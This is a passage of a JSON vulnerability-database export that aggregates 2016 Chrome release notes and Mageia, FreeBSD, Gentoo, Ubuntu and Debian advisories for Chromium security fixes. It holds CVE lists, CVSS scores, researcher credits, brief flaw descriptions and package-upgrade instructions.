"NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-01T00:00:00", "id": "GCSA-7843997242018906576", "href": "https://chromereleases.googleblog.com/2016/12/stable-channel-update-for-desktop.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T22:33:31", "description": "The stable channel has been updated to 54.0.2840.99 for Windows, 54.0.2840.98 for Mac, and 54.0.2840.100 on Linux. This will roll out over the coming days/weeks. \n\n\n\n## Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [4](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3ARelease-3-M54>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$5500][[643948](<https://crbug.com/643948>)] High CVE-2016-5199: Heap corruption in FFmpeg. Credit to Paul Mehta\n\n[$5000][[658114](<https://crbug.com/658114>)] High CVE-2016-5200: Out of bounds memory access in V8. Credit to Choongwoo Han\n\n[$1000][[660678](<https://crbug.com/660678>)] Medium CVE-2016-5201: Info leak in extensions. Credit to Jann Horn\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[662843](<https://crbug.com/662843>)] CVE-2016-5202: Various fixes from internal audits, fuzzing and other initiatives\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), or [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>). \n\n\n\n\n\n\n\nA list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/54.0.2840.90..54.0.2840.100?pretty=fuller&n=10000>). Interested in [switching](<http://www.chromium.org/getting-involved/dev-channel>) release channels? Find out [how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\n\nRichard Bustamante\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2016-11-09T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2016-11-09T00:00:00", "id": "GCSA-6462542902786436405", "href": "https://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop_9.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T22:33:34", "description": "The Chrome team is delighted to announce the promotion of Chrome 54 to the stable channel - 54.0.2840.59 for Windows, Mac, and Linux. This will roll out over the coming days/weeks. \n\n\n\n\n\n\nChrome 54.0.2840.59 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/53.0.2785.143..54.0.2840.59?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 54.\n\nSecurity Fixes and Rewards\n\n\n\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [21](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3ARelease-0-M54>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$7500][[645211](<https://crbug.com/645211>)] High CVE-2016-5181: Universal XSS in Blink. Credit to Anonymous\n\n[$5500][[638615](<https://crbug.com/638615>)] High CVE-2016-5182: Heap overflow in Blink. Credit to Giwan Go of STEALIEN\n\n[$3000][[645122](<https://crbug.com/645122>)] High CVE-2016-5183: Use after free in PDFium. Credit to Anonymous\n\n[$3000][[630654](<https://crbug.com/630654>)] High CVE-2016-5184: Use after free in PDFium. Credit to Anonymous\n\n[$3000][[621360](<https://crbug.com/621360>)] High CVE-2016-5185: Use after free in Blink. Credit to cloudfuzzer\n\n[$1000][[639702](<https://crbug.com/639702>)] High CVE-2016-5187: URL spoofing. Credit to Luan Herrera\n\n[$3133.7][[565760](<https://crbug.com/565760>)] Medium CVE-2016-5188: UI spoofing. Credit to Luan Herrera\n\n[$1000][[633885](<https://crbug.com/633885>)] Medium CVE-2016-5192: Cross-origin bypass in Blink. Credit to haojunhou@gmail.com\n\n[$500][[646278](<https://crbug.com/646278>)] Medium CVE-2016-5189: URL spoofing. Credit to xisigr of Tencent's Xuanwu Lab\n\n[$500][[644963](<https://crbug.com/644963>)] Medium CVE-2016-5186: Out of bounds read in DevTools. Credit to Abdulrahman Alqabandi (@qab)\n\n[$500][[639126](<https://crbug.com/639126>)] Medium CVE-2016-5191: Universal XSS in Bookmarks. Credit to Gareth Hughes\n\n[$N/A][[642067](<https://crbug.com/642067>)] Medium CVE-2016-5190: Use after free in Internals. Credit to Atte Kettunen of OUSPG\n\n[$500][[639658](<https://crbug.com/639658>)] Low CVE-2016-5193: Scheme bypass. Credit to Yuyang ZHOU (martinzhou96)\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[654782](<https://crbug.com/654782>)] CVE-2016-5194: Various fixes from internal audits, fuzzing and other initiatives\n\n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), or [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>).\n\n\n\n\n\n\n\nInterested in switching release channels?[ Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by[ filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n\n\nRichard Bustamante\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-12T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2016-10-12T00:00:00", "id": "GCSA-1455133819237092676", "href": "https://chromereleases.googleblog.com/2016/10/stable-channel-update-for-desktop.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Multiple flaws were found in the way Chromium 54 processes various types of web content, where loading a web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information. (CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214, CVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-15T20:33:35", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-15T20:33:35", "id": "MGASA-2016-0419", "href": "https://advisories.mageia.org/MGASA-2016-0419.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Multiple flaws were found in Chromium's processing of web content where loading a web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information. (CVE-2016-5181, CVE-2016-5182, CVE-2016-5183, CVE-2016-5184, CVE-2016-5185, CVE-2016-5186, CVE-2016-5187, CVE-2016-5188, CVE-2016-5189, CVE-2016-5190, CVE-2016-5191, CVE-2016-5192, CVE-2016-5193, CVE-2016-5194, CVE-2016-5198, CVE-2016-5199, CVE-2016-5200, CVE-2016-5201, CVE-2016-5202) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-27T12:34:14", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194", "CVE-2016-5198", "CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2016-11-27T12:34:14", "id": "MGASA-2016-0403", "href": "https://advisories.mageia.org/MGASA-2016-0403.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nGoogle Chrome Releases reports:\n\n36 security fixes in this release\nPlease reference CVE/URL list for details\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-01T00:00:00", "id": "603FE0A1-BB26-11E6-8E5A-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nGoogle Chrome Releases reports:\n\n4 security fixes in this release, including:\n\n[643948] High CVE-2016-5199: Heap corruption in FFmpeg. Credit to\n\t Paul Mehta\n[658114] High CVE-2016-5200: Out of bounds memory access in V8. Credit to\n\t Choongwoo Han\n[660678] Medium CVE-2016-5201: Info leak in extensions. Credit to\n\t Rob Wu\n[662843] CVE-2016-5202: Various fixes from internal audits,\n\t fuzzing and other initiatives\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2016-11-09T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2016-11-09T00:00:00", "id": "A3473F5A-A739-11E6-AFAA-E8E0B747A45A", "href": "https://vuxml.freebsd.org/freebsd/a3473f5a-a739-11e6-afaa-e8e0b747a45a.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:13", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-55.0.2883.75\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-05T00:00:00", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-05T00:00:00", "id": "GLSA-201612-11", "href": "https://security.gentoo.org/glsa/201612-11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-17T19:06:17", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-54.0.2840.100\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2016-11-22T00:00:00", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2016-11-22T00:00:00", "id": "GLSA-201611-16", "href": "https://security.gentoo.org/glsa/201611-16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T12:20:09", "description": "Multiple vulnerabilities were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to conduct cross-site scripting (XSS) attacks, \nread uninitialized memory, obtain sensitive information, spoof the \nwebview URL, bypass same origin restrictions, cause a denial of service \nvia application crash, or execute arbitrary code. (CVE-2016-5204, \nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5212, \nCVE-2016-5215, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, \nCVE-2016-9650, CVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked in \nto opening a specially crafted website, an attacker could potentially \nexploit these to obtain sensitive information, cause a denial of service \nvia application crash, or execute arbitrary code. (CVE-2016-5213, \nCVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via application crash, or execute \narbitrary code. (CVE-2016-5221)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-09T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5213", "CVE-2016-5207", "CVE-2016-5205", "CVE-2016-5215", "CVE-2016-5222", "CVE-2016-5208", "CVE-2016-5219", "CVE-2016-5212", "CVE-2016-5224", "CVE-2016-9651", "CVE-2016-5226", "CVE-2016-9652", "CVE-2016-5209", "CVE-2016-5204", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-5221"], "modified": "2016-12-09T00:00:00", "id": "USN-3153-1", "href": "https://ubuntu.com/security/notices/USN-3153-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-11-30T04:02:52", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3731-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nDecember 11, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-5181 CVE-2016-5182 CVE-2016-5183 CVE-2016-5184\n CVE-2016-5185 CVE-2016-5186 CVE-2016-5187 CVE-2016-5188\n CVE-2016-5189 CVE-2016-5190 CVE-2016-5191 CVE-2016-5192\n CVE-2016-5193 CVE-2016-5194 CVE-2016-5198 CVE-2016-5199\n CVE-2016-5200 CVE-2016-5201 CVE-2016-5202 CVE-2016-5203\n CVE-2016-5204 CVE-2016-5205 CVE-2016-5206 CVE-2016-5207\n CVE-2016-5208 CVE-2016-5209 CVE-2016-5210 CVE-2016-5211\n CVE-2016-5212 CVE-2016-5213 CVE-2016-5214 CVE-2016-5215\n CVE-2016-5216 CVE-2016-5217 CVE-2016-5218 CVE-2016-5219\n CVE-2016-5220 CVE-2016-5221 CVE-2016-5222 CVE-2016-5223\n CVE-2016-5224 CVE-2016-5225 CVE-2016-5226 CVE-2016-9650\n CVE-2016-9651 CVE-2016-9652\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-5181\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5182\n\n Giwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\n\n Another use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\n\n cloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\n\n Abdulrahman Alqabandi discovered an out-of-bounds read issue in the\n developer tools.\n\nCVE-2016-5187\n\n Luan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188\n\n Luan Herrera discovered that some drop down menus can be used to\n hide parts of the user interface.\n\nCVE-2016-5189\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5190\n\n Atte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191\n\n Gareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192\n\n haojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193\n\n Yuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5198\n\n Tencent Keen Security Lab discovered an out-of-bounds memory access\n issue in the v8 javascript library.\n\nCVE-2016-5199\n\n A heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200\n\n Choongwoo Han discovered an out-of-bounds memory access issue in\n the v8 javascript library.\n\nCVE-2016-5201\n\n Rob Wu discovered an information leak.\n\nCVE-2016-5202\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5203\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204\n\n Mariusz Mlynski discovered a cross-site scripting issue in SVG\n image handling.\n\nCVE-2016-5205\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5206\n\n Rob Wu discovered a same-origin bypass in the pdfium 